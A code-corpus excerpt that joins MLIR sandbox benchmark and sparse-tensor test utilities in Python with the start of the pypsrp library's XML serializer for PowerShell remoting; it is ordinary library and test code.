def tensors_np_builder(self, sizes: Mapping[str, Any],
types: Sequence[np.dtype]) -> List[np.dtype]:
"""NumPy tensors building function.
Given a mapping between dimension names / op attributes and their numeric
values, and a list of NumPy elemental types, return constructed NP values of
shapes given by `shape_builder` and specified elemental types.
"""
shapes = self.shapes_builder(sizes)
tensors = [
realign(np.random.rand(*s).astype(t), byte_alignment=64)
for s, t in zip(shapes, types)
]
# Uncomment to simplify debugging.
# tensors = [
# realign(np.arange(1, np.prod(s) + 1).reshape(s).astype(t), \
# byte_alignment=64) \
# for s, t in zip(shapes, np_types)
# ]
tensors[len(tensors) - 1].fill(0.)
return tensors
def check_np(self, A: np.dtype, B: np.dtype, C: np.dtype) -> None:
"""NumPy checking function.
Given a list of NumPy values, check the precomputed results matches those of
the expected reference implementation.
"""
if not np.allclose(C, np.dot(A, B)):
delta = C - np.dot(A, B)
max_abs_delta = max(delta.max(), delta.min(), key=abs)
raise Exception(f"max_abs_delta: {max_abs_delta} -> FAILURE ")
def types_mlir_builder(self, sizes: Mapping[str, Any],
types: Sequence[Type]) -> List[Type]:
"""MLIR types builder.
Given a mapping between dimension names / op attributes and their numeric
values, and a list of elemental MLIR types, return MLIR tensor types of the
shape expected by the function.
"""
shapes = self.shapes_builder(sizes)
return [RankedTensorType.get(s, t) for s, t in zip(shapes, types)]
def build_problem_under_context_manager(
self, name: str, types: Sequence[Type],
zero_at_each_iteration: bool) -> builtin.FuncOp:
"""MLIR problem builder.
Given a list of MLIR shaped types, build and return the MLIR FuncOp that
implements the desired computation on those types.
"""
global avx512
# Actual benchmarked function called under entry_point_name.
bench = builtin.FuncOp(name, (types, [types[-1]]))
# TODO: need something much more flexible to add function argument attributes.
attach_inplaceable_attributes(bench, inplaceable=[False, False, True])
attach_passthrough(
bench, [StringAttr.get(os.getenv('SANDBOX_INLINING', 'noinline'))],
avx512=avx512)
acc_type = types[-1].element_type
with InsertionPoint(bench.add_entry_block()):
tensor_zero = bench.arguments[2]
if zero_at_each_iteration:
zero = arith.ConstantOp(types[-1].element_type, 0.0)
tensor_zero = linalg.FillOp(output=tensor_zero, value=zero)
matmul = linalg.matmul(bench.arguments[0],
bench.arguments[1],
outs=[tensor_zero])
# linalg.matmul returns a Value instead of OpView, so we have to manually
# wrap it in a list here.
func.ReturnOp([matmul])
return bench
# TODO: fold OpDSL definition and inferences into ProblemDefinition.
@linalg_structured_op
def add_bias_to_2d(I=TensorDef(T, S.M, S.N),
Bias=TensorDef(T, S.N),
O=TensorDef(T, S.M, S.N, output=True)):
domain(D.m, D.n)
O[D.m, D.n] = I[D.m, D.n] + Bias[D.n]
class MatmulBiasAddProblem(ProblemDefinition):
""" Problem definition for a fill + matmul + generic op."""
def shapes_builder(self, sizes: Mapping[str, Any]) -> List[List[int]]:
"""Shape builder function.
Given a mapping between dimension names / op attributes and their numeric
values, return the list of lists of shapes of the FuncOp operands. The
FuncOp is responsible for distinguishing between input operands and results.
"""
M, N, K = sizes["M"], sizes["N"], sizes["K"]
return [
[M, K],
[K, N],
[N],
[M, N],
]
def gflop_count_builder(self, sizes: Mapping[str, Any]) -> float:
"""GFlop builder function.
Given a mapping between dimension names / op attributes and their numeric
values, return the number of GFlops computed.
"""
M, N, K = sizes["M"], sizes["N"], sizes["K"]
return float(2.0 * M * N * K + M * N) / float(1e9)
def gbyte_count_builder(self, sizes: Mapping[str, Any],
types: Sequence[np.dtype]) -> float:
"""GByte builder function.
Given a mapping between dimension names / op attributes and their numeric
values, and a list of data types, return the number of GBytes read or
written.
"""
M, N, K = sizes["M"], sizes["N"], sizes["K"]
lhs_np_type, rhs_np_type, acc_np_type, res_np_type = types
return float(M * K * np.dtype(lhs_np_type).itemsize +
K * N * np.dtype(rhs_np_type).itemsize +
N * np.dtype(acc_np_type).itemsize +
M * N * np.dtype(res_np_type).itemsize) / float(1e9)
def tensors_np_builder(self, sizes: Mapping[str, Any],
types: Sequence[np.dtype]) -> List[np.dtype]:
"""NumPy tensors building function.
Given a mapping between dimension names / op attributes and their numeric
values, and a list of NumPy elemental types, return constructed NP values of
shapes given by `shape_builder` and specified elemental types.
"""
shapes = self.shapes_builder(sizes)
tensors = [
realign(np.random.rand(*s).astype(t), byte_alignment=64)
for s, t in zip(shapes, types)
]
tensors[len(tensors) - 1].fill(0.)
return tensors
def check_np(self, A: np.dtype, B: np.dtype, C: np.dtype,
D: np.dtype) -> None:
"""NumPy checking function.
Given a list of NumPy values, check the precomputed results matches those of
the expected reference implementation.
"""
res = np.dot(A, B) + C
if not np.allclose(D, res):
delta = D - res
max_abs_delta = max(delta.max(), delta.min(), key=abs)
raise Exception(f"max_abs_delta: {max_abs_delta} -> FAILURE ")
def types_mlir_builder(self, sizes: Mapping[str, Any],
types: Sequence[Type]) -> List[Type]:
"""MLIR types builder.
Given a mapping between dimension names / op attributes and their numeric
values, and a list of elemental MLIR types, return MLIR tensor types of the
shape expected by the function.
"""
shapes = self.shapes_builder(sizes)
return [RankedTensorType.get(s, t) for s, t in \
zip(shapes, list(types) + [types[-1]])]
def build_problem_under_context_manager(
self, name: str, types: Sequence[Type],
zero_at_each_iteration: bool) -> builtin.FuncOp:
"""MLIR problem builder.
Given a list of MLIR shaped types, build and return the MLIR FuncOp that
implements the desired computation on those types.
"""
global avx512
# Actual benchmarked function called under entry_point_name.
bench = builtin.FuncOp(name, (types, [types[-1]]))
# TODO: need something much more flexible to add function argument attributes.
attach_inplaceable_attributes(bench, inplaceable=[False, False, False, True])
attach_passthrough(
bench, [StringAttr.get(os.getenv('SANDBOX_INLINING', 'noinline'))],
avx512=avx512)
acc_type = types[-2].element_type
with InsertionPoint(bench.add_entry_block()):
tensor_zero = bench.arguments[3]
if zero_at_each_iteration:
zero = arith.ConstantOp(types[-1].element_type, 0.0)
tensor_zero = linalg.FillOp(output=tensor_zero, value=zero)
matmul = linalg.matmul(bench.arguments[0],
bench.arguments[1],
outs=[tensor_zero])
bias_add = add_bias_to_2d(matmul,
bench.arguments[2],
outs=[bench.arguments[3]])
# linalg.matmul returns a Value instead of OpView, so we have to manually
# wrap it in a list here.
func.ReturnOp([bias_add])
return bench
```
#### File: examples/sparse/test_common.py
```python
from enum import Enum
import dataclasses
from typing import Any, Callable, List, Optional, Tuple
import argparse
import ctypes
import itertools
import logging
import numpy as np
import os
import random
# Import MLIR related modules.
from mlir import execution_engine as ee
from mlir import ir
from mlir import runtime
from mlir.dialects import builtin
from mlir.dialects import func
from mlir.dialects import sparse_tensor as st
from mlir.dialects.linalg.opdsl import lang as dsl
# Import compilation utilties for the tests.
from ..core import experts
# Message to print out when tests stop with failure.
FAILURE_MESSAGE = "FAILURE"
# Generate a non-zero every 5 values to achieve 20% density.
_STEP_FOR_NON_ZERO_VALUES = 5
# The non-zero values used by the generator, if not provided by the tests.
_DEFAULT_NON_ZERO_VALUES = (1, 2, 3, 4, 5)
# A plane has two dimensions.
_RANK_FOR_PLANE = 2
# A default seed to initialize random state.
_DEFAULT_SEED = 5
# The name for the environment variable that provides the full path for the
# supporting library.
_SUPPORTLIB_ENV_VAR = "SUPPORTLIB"
# The default supporting library if the environment variable is not provided.
_DEFAULT_SUPPORTLIB = "libmlir_c_runner_utils.so"
# The JIT compiler optimization level.
_OPT_LEVEL = 2
# The entry point to the JIT compiled program.
_ENTRY_NAME = "main"
# TODO(b/195340661): Add bitwidth 8.
# Bitwidths for pointer and indices.
_SUPPORTED_BIT_WIDTHS = (0, 16, 32, 64)
# Sparse codegen parallelization options.
_SUPPORTED_PARALLELIZATION_OPTIONS = (0, 1, 2, 3, 4)
# Sparse codegen vector lengths.
_SUPPORTED_VECTOR_LENGTHS = (1, 16, 64)
# Available sparsity values for each tensor dimension.
_SUPPORTED_SPARSITY_VALUES = (st.DimLevelType.dense, st.DimLevelType.compressed)
# Alias for annotating the type for the function object used to invoke the
# compiler.
CompilerType = Callable[
[ir.Module, Callable[[str, List[st.EncodingAttr]], str]], ir.Module]
class _Scheme(Enum):
"""Schemes for generating non-zero values for sparse input tensors.
* `DOT`: A scheme for generating non-zero values as scattered dots.
* `PLANE`: A scheme for generating non-zero values in hyperplanes.
"""
DOT = 0
PLANE = 1
class TDType(Enum):
""" The data types being tested."""
# TODO(b/195340661): Add int8.
I16 = np.int16
I32 = np.int32
I64 = np.int64
# numpy _ctype_from_dtype_scalar can't handle float16 yet.
F32 = np.float32
F64 = np.float64
def mlir_type_from_td_type(td_type: TDType) -> ir.Type:
"""Returns the MLIR type that corresponds to the given test descr type."""
tdtype_to_irtype = {
TDType.I16: ir.IntegerType.get_signless(16),
TDType.I32: ir.IntegerType.get_signless(32),
TDType.I64: ir.IntegerType.get_signless(64),
TDType.F32: ir.F32Type.get(),
TDType.F64: ir.F64Type.get()
}
return tdtype_to_irtype[td_type]
# Supported integer types.
_SUPPORTED_INT_TYPES = (TDType.I16, TDType.I32, TDType.I64)
# Supported floating point types.
_SUPPORTED_FP_TYPES = (TDType.F32, TDType.F64)
def _generate_tensor_dot(shape: List[int], values: Tuple[int, ...],
first_nonzero_pos: int) -> List[int]:
"""Generates a tensor with non-zero values as scattered dots."""
num_elements = np.prod(shape)
num_generated = 0
num_available = len(values)
data = []
for i in range(num_elements):
if (i % _STEP_FOR_NON_ZERO_VALUES) == first_nonzero_pos:
data.append(values[num_generated % num_available])
num_generated += 1
else:
data.append(0)
return data
def _generate_tensor_plane(shape: List[int], values: Tuple[int, ...],
first_nonzero_pos: int) -> List[int]:
"""Generates a tensor with non-zero values on planes."""
plane_shape = shape[-_RANK_FOR_PLANE:]
other_shape = shape[:-_RANK_FOR_PLANE]
num_plane_elements = np.prod(plane_shape)
num_other_elements = np.prod(other_shape)
num_generated = 0
num_available = len(values)
data = []
for j in range(num_other_elements):
for i in range(num_plane_elements):
if (i % _STEP_FOR_NON_ZERO_VALUES) == first_nonzero_pos:
data.append(values[num_generated % num_available])
num_generated += 1
else:
data.append(0)
return data
def generate_tensor(shape: List[int],
scheme: Optional[_Scheme] = None,
values: Optional[Tuple[int, ...]] = None,
seed: int = _DEFAULT_SEED) -> List[int]:
"""Generates values for a sparse input tensor.
Args:
shape: A list of integers, representing the dimensions of the input tensor.
scheme: An Enum value of _Scheme, representing the scheme to be used. If a
scheme is not provided, a scheme is chosen randomly.
values: A tuple of integers used cyclically as the non-zero values for
generating the sparse tensor.
seed: An integer value to initialize the random number generator state. The
random number generator is used to select a generation scheme when a
scheme is not provided and to decide on the position of the first non-zero
value.
Returns:
The sparse tensor value represented as a list of integers.
"""
random_state = np.random.RandomState(_DEFAULT_SEED)
if len(shape) <= 2:
# When rank <= 2, _Scheme.PLANE degenerates to _Scheme.DOT.
scheme = _Scheme.DOT
elif scheme is None:
# If a scheme is not specified, randomly choose a scheme.
scheme = _Scheme.PLANE if random_state.choice(2) else _Scheme.DOT
values = values or _DEFAULT_NON_ZERO_VALUES
# Generate a random value in range 0.._STEP_FOR_NON_ZERO_VALUES to randomdize
# the position of the first non-zero value.
first_nonzero_pos = random_state.choice(_STEP_FOR_NON_ZERO_VALUES)
# Generate the data as a list of values.
data = (_generate_tensor_dot(shape, values, first_nonzero_pos)
if scheme == _Scheme.DOT else _generate_tensor_plane(
shape, values, first_nonzero_pos))
return data
@dataclasses.dataclass(frozen=True)
class InputDesc:
"""Describing an input for the operation being tested.
Attributes:
ordering: A list of integers for the storage ordering of the input
dimensions.
sparsity: A list of DimLevelType for the sparsity of each input dimension.
pointed_bw: An integer pointer bit width.
index_bw: An integer index bit width.
"""
ordering: List[int]
sparsity: List[st.DimLevelType]
pointer_bw: int
index_bw: int
def __post_init__(self):
if len(self.ordering) != len(self.sparsity):
raise ValueError("Different lengths for ordering and sparsity: " +
f"{len(self.ordering)} != {len(self.sparsity)}.")
if sorted(self.ordering) != list(range(len(self.ordering))):
raise ValueError("Problem with ordering: " + f"{str(self.ordering)} != " +
f"permutation{str(list(range(len(self.ordering))))}.")
def _ctype_pointer_from_array(array) -> ctypes.POINTER:
"""Returns the ctype pointer for the given numpy array."""
return ctypes.pointer(
ctypes.pointer(runtime.get_ranked_memref_descriptor(array)))
class TestDesc:
"""Describing a test for an opeartion.
A test descriptor has the following properties:
inputs: A read-only property to access the input affine expressions.
outputs: A read-only property to access the output affine expressions.
linalg_op: A writable property to access the linear algebra operation
being test.
"""
# A TestDesc has the following attributes:
# _name: The name of the test.
# _iter_space: Represents the affine expression definition and the size for
# each dimension in the iteration space.
# _input_affines: The list of inputs. Each input for the operation being
# tested is defined by a list of affine expression definition.
# _input_tensors: The list of input tensors. Each input tensor is represented
# as a list of integers.
# _output: The output for the operation being tests, represented as a list of
# affine expression definitions.
# _linalg_op: The operation being tested. This is assigned after the object
# is defined because the definition of linalg_op requires other fields in
# the TestDesc object and we can't move the definition of _linalg_op to
# TestDesc.
# _ref_result: The reference result of the test, set up through method
# calculate_reference_result.
@property
def inputs(self) -> List[List[dsl.AffineExprDef]]:
"""The input affine expressions."""
return self._input_affines
def _get_dims_from_affine_expr(
self, affine_exps: List[dsl.AffineExprDef]) -> List[int]:
"""Returns the dimensions for the affine expression."""
return [self._iter_space[exp] for exp in affine_exps]
def _get_input_dims(self, index: int) -> List[int]:
"""Returns the dimension values for the given input."""
return self._get_dims_from_affine_expr(self.inputs[index])
def __init__(self, name: str, iter_space_exps: List[dsl.AffineExprDef],
iter_space_sizes: List[int], output: List[dsl.AffineExprDef],
*inputs: List[List[dsl.AffineExprDef]]):
"""Constructs a test descriptor.
Args:
name: The name of the test.
iter_space_exps: A list of AffineExprDef, representing the affine
expression definition for each dimension in the iteration space.
iter_space_sizes: A list of integers, representing the size for each
dimension in the iteration space.
output: A list of AffineExprDef, representing the affine expression
definition for each dimension in the output tensor.
inputs: All the inputs for the operation being tested. Each input is
represented by a list of AffineExprDef, representing the affine
expression definition for each dimension in the input tensor.
Raises:
ValueError: When there is a problem with the inputs. The lengths of
iter_space_exps and iter_space_sizes should equal. Affine expressions
used by output/inputs should be defined in iter_space_exps. Values in
iter_space_sizes should be larger than zero.
"""
if len(iter_space_exps) != len(iter_space_sizes):
raise ValueError("Different lengths for iter_space_exps and " +
"iter_space_size: " +
f"{len(iter_space_exps)} != {len(iter_space_sizes)}.")
if any(v <= 0 for v in iter_space_sizes):
raise ValueError("iter_space_sizes contains values not larger than 0: " +
f"{str(iter_space_sizes)}.")
self._iter_space = dict(zip(iter_space_exps, iter_space_sizes))
self._linalg_op = None
self._ref_result = None
# Verify each affine expression in output.
for affine in output:
if affine not in self._iter_space:
raise ValueError(f"Output affine expression {str(affine)}" +
" not defined in the iteration space.")
self._output = output
self._name = name
self._input_affines = []
self._input_tensors = []
for index, affines in enumerate(inputs):
# Verify each affine expression in the input.
for affine in affines:
if affine not in self._iter_space:
raise ValueError(f"Input affine expression {str(affine)}" +
" not defined in the iteration space.")
self._input_affines.append(affines)
self._input_tensors.append(generate_tensor(self._get_input_dims(index)))
@property
def output(self) -> List[dsl.AffineExprDef]:
"""The output affine expressions."""
return self._output
@property
def linalg_op(self) -> dsl.LinalgOpDef:
"""The linear algebra operation being tested."""
return self._linalg_op
@linalg_op.setter
def linalg_op(self, op: Callable[..., dsl.DefinedOpCallable]) -> None:
self._linalg_op = op
def _get_num_inputs(self) -> int:
"""Returns the total number of inputs for the operation being tested."""
return len(self._input_affines)
def _get_output_dims(self) -> List[int]:
"""Returns the dimension values for the output."""
return self._get_dims_from_affine_expr(self.output)
def _get_inputs_for_type(self, type: TDType) -> List[np.ndarray]:
"""Returns a list of numpy array with the given type for the inputs."""
return [
np.array(v,
dtype=type.value).reshape(self._get_dims_from_affine_expr(a))
for v, a in zip(self._input_tensors, self._input_affines)
]
def _emit_main_function(self, callee_name: str, td_type: TDType,
attrs: List[st.EncodingAttr]):
"""Emits the 'main' method to call the `callee_name` function.
The function is emitted at the current insertion point, assumed to be within
a module. This function contains the following:
- Set up input tensors.
- Call the callee function.
- Return the result of the function call.
Args:
calee_name: The name of the function for the operation being tested.
td_type: The data type used to run the operation being tested.
attrs: A list of EncodingAttr, one for each input of the operation being
tested.
"""
# Define the main function.
mlir_type = mlir_type_from_td_type(td_type)
num_inputs = self._get_num_inputs()
input_types = [
ir.RankedTensorType.get(self._get_input_dims(i), mlir_type)
for i in range(num_inputs)
]
output_types = [ir.RankedTensorType.get(self._get_output_dims(), mlir_type)]
main_func = builtin.FuncOp(_ENTRY_NAME,
(input_types + output_types, output_types),
visibility="public")
main_func.attributes["llvm.emit_c_interface"] = ir.UnitAttr.get()
# Convert the operands to sparse encodings, call the callee and return its
# result.
with ir.InsertionPoint(main_func.add_entry_block()):
converted_tensors = []
for i, argument, encoding in zip(range(num_inputs), main_func.arguments,
attrs):
conversion = st.ConvertOp(
ir.RankedTensorType.get(self._get_input_dims(i), mlir_type,
encoding), argument)
converted_tensors.append(conversion.dest)
call = func.CallOp(output_types, ir.FlatSymbolRefAttr.get(callee_name),
converted_tensors + [main_func.arguments[-1]])
func.ReturnOp(call.results)
def _build_module_and_engine(
self, compiler: CompilerType, type: TDType,
attrs: List[st.EncodingAttr]) -> ee.ExecutionEngine:
"""Builds the program and the execution engine.
Args:
compiler: A Callable object for invoking the compiler.
type: The data type for the operation being tested.
attrs: A list of EncodingAttr, one for each input of the operation being
tested.
Returns:
The execution engine that executes the JIT compiled operation.
"""
module = ir.Module.create()
# Build the data types for the inputs and output.
ir_type = mlir_type_from_td_type(type)
inputs_output = []
for i in range(self._get_num_inputs()):
inputs_output.append(
ir.RankedTensorType.get(self._get_input_dims(i), ir_type, attrs[i]))
inputs_output.append(
ir.RankedTensorType.get(self._get_output_dims(), ir_type))
# Build the kernel for the linalg operation being tested.
with ir.InsertionPoint(module.body):
@builtin.FuncOp.from_py_func(*inputs_output)
def linalg_funcop(*args):
return self._linalg_op(*args[:-1], outs=[args[len(args) - 1]])
self._emit_main_function(linalg_funcop.__name__, type, attrs)
# Invoke JIT compilation.
compiled_module = compiler(_ENTRY_NAME, module)
# We currently rely on an environment to pass in the full path for a
# supporting library to overwrite the default supporting library.
support_lib = os.getenv(_SUPPORTLIB_ENV_VAR, _DEFAULT_SUPPORTLIB)
engine = ee.ExecutionEngine(compiled_module,
opt_level=_OPT_LEVEL,
shared_libs=[support_lib])
return engine
def _compile_and_run(self, compiler: CompilerType, type: TDType,
attrs: List[st.EncodingAttr],
inputs: List[np.ndarray]) -> np.ndarray:
"""Compiles and executes the test.
Args:
compiler: A Callable object for invoking the compiler.
attrs: A list of EncodingAttr, one for each input of the operation being
tested.
inputs: A list of numpy arrays for the input tensors.
Returns:
The output of the operation being test, represented as a numpy array.
"""
# Numpy arrays are accessed by MLIR computation via their ctype pointers.
# Gather a list of ctype pointers for the numpy arrays.
ctype_pointers = []
output_dims = self._get_output_dims()
# Add the pointer for the output tensor.
c_out = np.zeros(output_dims, type.value)
ctype_pointers.append(_ctype_pointer_from_array(c_out))
# Add the pointers for the input tensors.
for i in range(self._get_num_inputs()):
ctype_pointers.append(_ctype_pointer_from_array(inputs[i]))
# Add the pointer for the initial value of the output tensor. Currently,
# the initial value and the output value have to be different.
c_init = np.zeros(output_dims, type.value)
ctype_pointers.append(_ctype_pointer_from_array(c_init))
# Invoke JIT compilation, then execute the compiled code.
with ir.Context() as ctx, ir.Location.unknown():
engine = self._build_module_and_engine(compiler, type, attrs)
engine.invoke(_ENTRY_NAME, *ctype_pointers)
return runtime.ranked_memref_to_numpy(ctype_pointers[0][0])
def get_result(self, p: int, vl: int, type: TDType,
input_descs: List[InputDesc]) -> np.ndarray:
"""Returns the result for the test for the given codegen parameters.
Args:
p: An integer representing the parallelization strategy.
vl: An integer representing the vector length.
type: The TDType for the result.
input_descs: A list of InputDesc, representing dimension ordering and
sparsity for the input tensors.
Returns:
The result produced by executing the compiled code.
"""
with ir.Context() as ctx:
inputs = self._get_inputs_for_type(type)
attrs = []
for desc in input_descs:
perm = ir.AffineMap.get_permutation(desc.ordering)
attr = st.EncodingAttr.get(desc.sparsity, perm, desc.pointer_bw,
desc.index_bw)
attrs.append(attr)
v = 0 if vl == 1 else 1
# TODO(b/195340661): When vl is non-trivial, enumerates the options for
# enable-simd-index32.
si = False
opt = (f"parallelization-strategy={p} "
f"vectorization-strategy={v} vl={vl} "
f"enable-simd-index32={si}")
compiler = experts.ExpertSparseCompiler(options=opt)
return self._compile_and_run(compiler, type, attrs, inputs)
def calculate_reference_result(self, type: TDType) -> None:
"""Calculates the reference result for the test.
Args:
type: The data type used to run the operation to get the reference result.
Returns:
Uses a default set of codegen parameters to compile the test. Returns the
result produced by executing the compiled code.
"""
with ir.Context() as ctx:
input_descs = []
for i in range(self._get_num_inputs()):
input_descs.append(
InputDesc(list(range(len(self._input_affines[i]))),
[st.DimLevelType.dense] * len(self._input_affines[i]), 0,
0))
self._ref_result = self.get_result(0, 1, type, input_descs)
def get_reference_result(self, type: TDType) -> np.ndarray:
""" Returns the reference result for the test.
This routine assumes calculate_reference_result has been called to
calculate the result and record the result in the attribute.
Args:
type: The data type for the output result.
Returns:
Converts the pre-calculated reference result to the desired data type and
returns the result.
Raises:
ValueError: if calculate_reference_result is not called to make the
reference result available.
"""
if self._ref_result is None:
raise ValueError("Need to call calculate_reference_result to set up" +
" the reference result.")
return self._ref_result.astype(type.value)
# Defines the annotation and codegen options used for the exhaustive tests.
def sparsities2() -> List[Tuple[st.DimLevelType, st.DimLevelType]]:
"""Enumerates the sparsities for an input with rank 2."""
return itertools.product(_SUPPORTED_SPARSITY_VALUES,
_SUPPORTED_SPARSITY_VALUES)
def sparsities3(
) -> List[Tuple[st.DimLevelType, st.DimLevelType, st.DimLevelType]]:
"""Enumerates the sparsities for an input with rank 3."""
return itertools.product(_SUPPORTED_SPARSITY_VALUES,
_SUPPORTED_SPARSITY_VALUES,
_SUPPORTED_SPARSITY_VALUES)
# TODO(b/195340661): Add a method to generate a permutation for range(n) to
# support larger rank values. This will retire the use of the constant values.
def orderings2() -> List[List[int]]:
"""Enumerates the storage orderings an input with rank 2."""
return [[0, 1], [1, 0]]
# TODO(b/195340661): Add a method to generate a permutation for range(n) to
# support larger rank values. This will retire the use of the constant values.
def orderings3() -> List[List[int]]:
"""Enumerates the storage orderings for an input with rank 3."""
return [[0, 1, 2], [0, 2, 1], [1, 0, 2], [1, 2, 0], [2, 0, 1], [2, 1, 0]]
# TODO(b/195340661): Add bitwidth 8.
def bitwidths() -> Tuple[int, ...]:
"""Enumerates the bit widths to be tested."""
return _SUPPORTED_BIT_WIDTHS
def pars() -> Tuple[int, ...]:
"""Enumerates the parallelization option values."""
return _SUPPORTED_PARALLELIZATION_OPTIONS
def vls() -> Tuple[int, ...]:
"""Enumerates the vector length option values."""
return _SUPPORTED_VECTOR_LENGTHS
def int_types() -> Tuple[TDType, ...]:
"""Enumerates the integer data types to be tested."""
return _SUPPORTED_INT_TYPES
def fp_types() -> Tuple[TDType, ...]:
"""Enumerates the floating point data types to be tested."""
return _SUPPORTED_FP_TYPES
def all_types() -> Tuple[TDType, ...]:
"""Enumerates all the data types to be tested."""
return _SUPPORTED_INT_TYPES + _SUPPORTED_FP_TYPES
def supported_tensor_types(type: TDType, pw: int, iw: int):
""" Checks whether the tensor type combination is supported.
Args:
type: A TDType enum for the data type of the tensor values.
pw: The pointer bitwidth for the tensor storage representation.
iw: The index bitwidth for the tensor storage representation.
Returns:
A boolean value to indicate whether the combination is supported (True) or
not supported (False).
"""
# newSparseTensor only supports pw == iw for integer types. For int64, it only
# supports pw == iw == 64.
return (type
not in _SUPPORTED_INT_TYPES) or (pw == iw and
(type != TDType.I64 or pw == 64))
def _get_command_line_values() -> Tuple[int, int]:
"""Parses the command line and returns (num_processes, log_level)."""
parser = argparse.ArgumentParser()
parser.add_argument(
"-num_processes",
type=int,
required=False,
default=os.cpu_count(),
help="the number of processes to run the test (default os.cpu_count())")
parser.add_argument("-log",
choices=["info", "error"],
default="info",
help="the logging level (default=info)"),
args = parser.parse_args()
levels = {
"error": logging.ERROR,
"info": logging.INFO,
}
return args.num_processes, levels[args.log]
def _run_tests_sequential(parameter_combinations: Callable[[], Tuple[Any, ...]],
run_test: Callable[..., bool]) -> bool:
"""Tests all combinations sequentially."""
return all(run_test(*c) for c in parameter_combinations())
def _run_tests_parallel(num_processes: int,
parameter_combinations: Callable[[], Tuple[Any, ...]],
run_test: Callable[..., bool]) -> bool:
"""Tests all combinations in parallel with the given number of processes."""
# Python multiprocessing doesn't work within Google. Import the Pool module
# only when multiprocessing is enable for this reason.
from multiprocessing import Pool
with Pool(num_processes) as pool:
# For each combination, assign a job to the worker pool and return a
# placeholder object for getting the test result. We use `c` not `*c` here
# as apply_async unpacks the tuple.
result_objs = [
pool.apply_async(run_test, c) for c in parameter_combinations()
]
# Get the results of the tests using the placeholder objects.
return all(result.get() for result in result_objs)
def run_tests_sequential_or_parallel(num_processes: int,
parameter_combinations: Callable[[], Tuple[
Any, ...]],
run_test: Callable[..., bool]) -> bool:
"""Runs the tests with the given number of processes.
Args:
num_processes: An integer for the number of processes used to run the tests.
The tests are run in parallel when this value is larger than one.
parameter_combinations: A Callable object for generating all the
combinations of the parameter values used to invoke run_test.
run_test: A Callable object for running a test with a given combination of
parameter values.
Returns:
A boolean to indicate whether all tests pass (True) or there are failing
tests (False).
"""
return (_run_tests_sequential(parameter_combinations, run_test)
if num_processes <= 1 else _run_tests_parallel(
num_processes, parameter_combinations, run_test))
def get_num_processes_and_run_tests(module_name: str,
test_driver: Callable[[int], bool]) -> bool:
"""Determines the number of processes and invokes the test driver.
The tests run differently in OSS vs in Google for two reasons.
- In Google, we use a python script to load and execute the module that
contains the tests to support the loading of the MLIR libraries. In OSS, we
directly run the module that contains the tests.
- Python multiprocessing works in OSS but doesn't work in Google.
As such, we only enable the commandline parser and multiprocessing when the
module is run directly.
Args:
module_name: The __name__ of the module that contains the tests, used to
determine whether the module is run directly or not.
test_driver: A callable object to run all tests in the module with the given
number of processes.
Returns:
A boolean to indicate whether all tests pass (True) or there are failing
tests (False).
"""
if module_name != "__main__":
num_processes = 1
log_level = logging.INFO
else:
num_processes, log_level = _get_command_line_values()
logging.basicConfig(level=log_level)
return test_driver(num_processes)
def test_combination_wrapper(
test_combination: Callable[..., bool]) -> Callable[..., int]:
"""Wraps a test function with post processing functionality.
In particular, the wrapper invokes test_combination, logs the test and its
status, and returns a boolean to indicate the status of passing (True) or
failing (False).
Args:
test_combination: A Callable object for invoking the test with one
combination of the test parameters, and returns a boolean to indicate the
status of passing (True) or failing (False).
Returns:
A wrapper of the given test_combination function.
"""
def wrapper(*args) -> int:
passed = test_combination(*args)
status_str = "passed" if passed else "failed"
test_name = "_".join([str(i) for i in args])
logging.info(f"test_{test_name} {status_str}.")
return passed
return wrapper
``` |
{
"source": "00mjk/pypsrp",
"score": 2
} |
#### File: src/pypsrp/serializer.py
```python
import base64
import binascii
import logging
import re
import typing
import uuid
import xml.etree.ElementTree as ET
from copy import copy
from queue import Empty, Queue
from cryptography.hazmat.primitives.padding import PKCS7
from pypsrp._utils import to_bytes, to_string, to_unicode
from pypsrp.complex_objects import (
ApartmentState,
Color,
CommandMetadataCount,
CommandOrigin,
ComplexObject,
Coordinates,
CultureInfo,
DictionaryMeta,
GenericComplexObject,
HostMethodIdentifier,
InformationalRecord,
KeyInfoDotNet,
ListMeta,
ObjectMeta,
ParameterMetadata,
PipelineResultTypes,
ProgressRecordType,
PSCredential,
PSThreadOptions,
QueueMeta,
RemoteStreamOptions,
SessionStateEntryVisibility,
Size,
StackMeta,
)
from pypsrp.exceptions import SerializationError
from pypsrp.messages import (
DebugRecord,
ErrorRecordMessage,
InformationRecord,
VerboseRecord,
WarningRecord,
)
log = logging.getLogger(__name__)
class Serializer(object):
def __init__(self) -> None:
self.obj_id = 0
self.obj: typing.Dict = {}
self.tn_id = 0
self.tn: typing.Dict = {}
self.cipher: typing.Any = None
# Finds C0, C1 and surrogate pairs in a unicode string for us to
# encode according to the PSRP rules
self._serial_str = re.compile("[\u0000-\u001F\u007F-\u009F\U00010000-\U0010FFFF]")
# to support surrogate UTF-16 pairs we need to use a UTF-16 regex
# so we can replace the UTF-16 string representation with the actual
# UTF-16 byte value and then decode that
self._deserial_str = re.compile(b"\\x00_\\x00x([\\0\\w]{8})\\x00_")
def serialize(
self,
value: typing.Any,
metadata: typing.Optional[ObjectMeta] = None,
parent: typing.Optional[ET.Element] = None,
clear: bool = True,
) -> typing.Optional[ET.Element]:
"""
Serializes a raw value or class into an XML Element that can be sent
over to the remote host.
:param value: The value to serialize
:param metadata: Any extra metadata to control how to serialize the
value, if None then the value will be inferred by the type
:param parent: Whether to append the element onto a parent element
:param clear: Whether to clear the Obj and TN reference map, this
should only be True when initially calling serialize
:return: The XML Element from the serializied value
"""
if clear:
self._clear()
if isinstance(value, ET.Element):
if metadata is not None and metadata.name is not None:
value.attrib["N"] = metadata.name
if parent is not None:
parent.append(value)
return value
metadata = metadata or ObjectMeta()
if metadata.tag == "*":
if isinstance(value, TaggedValue):
metadata.tag = value.tag
value = value.value
else:
metadata.tag = self._get_tag_from_value(value)
pack_function: typing.Callable[[ObjectMeta, typing.Any], ET.Element] = { # type: ignore[assignment] # Not sure why
# primitive types
"S": lambda m, d: self._serialize_string(d),
"ToString": lambda d: self._serialize_string(d),
"C": lambda m, d: str(ord(d)),
"B": lambda m, d: str(d).lower(),
"DT": lambda m, d: None,
"TS": lambda m, d: str(d),
"By": lambda m, d: str(d),
"SB": lambda m, d: str(d),
"U16": lambda m, d: str(d),
"I16": lambda m, d: str(d),
"U32": lambda m, d: str(d),
"I32": lambda m, d: str(d),
"U64": lambda m, d: str(d),
"I64": lambda m, d: str(d),
"Sg": lambda m, d: str(d),
"Db": lambda m, d: str(d),
"D": lambda m, d: str(d),
